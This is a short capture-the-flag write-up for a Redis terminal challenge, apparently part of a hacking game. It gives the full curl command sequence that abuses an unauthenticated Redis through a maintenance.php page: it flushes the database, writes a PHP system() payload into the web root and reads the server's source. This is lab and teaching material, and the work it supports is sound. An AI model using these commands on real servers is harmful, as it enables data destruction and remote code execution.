Redis Bug Hunt

Objective

Redis is an open source in-memory data store. In this terminal, Holly Evergreen needs some help finding the source code for the index page on the web server.

Tip

There are many sources on the Internet about pen-testing redis. This one was helpful in completing the terminal: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis.

Solution

Redis contains functions for accessing the file system. The danger of allowing unauthenticated connections is that an attacker could read/write files on the server to run a command or even install a full featured web shell.

$ curl http://localhost/maintenance.php?cmd=flushall
$ curl http://localhost/maintenance.php?cmd=config,set,dir,/var/www/html
$ curl http://localhost/maintenance.php?cmd=config,set,dbfilename,redis.php
$ curl http://localhost/maintenance.php?cmd=set,test,\<?php+system\(\'cat+/var/www/html/index.php\'\)\;?\>
$ curl http://localhost/maintenance.php?cmd=save

$ curl --output - http://localhost/redis.php
REDIS0009�      redis-ver5.0.3�
�edis-bits�@�ctime��k�_used-mem¸
 aof-preamble��� test.<?php
# We found the bug!!
#
#         \   /
#         .\-/.
#     /\ ()   ()
#       \/~---~\.-~^-.
# .-~^-./   |   \---.
#      {    |    }   \
#    .-~\   |   /~-.
#   /    \  A  /    \
#         \/ \/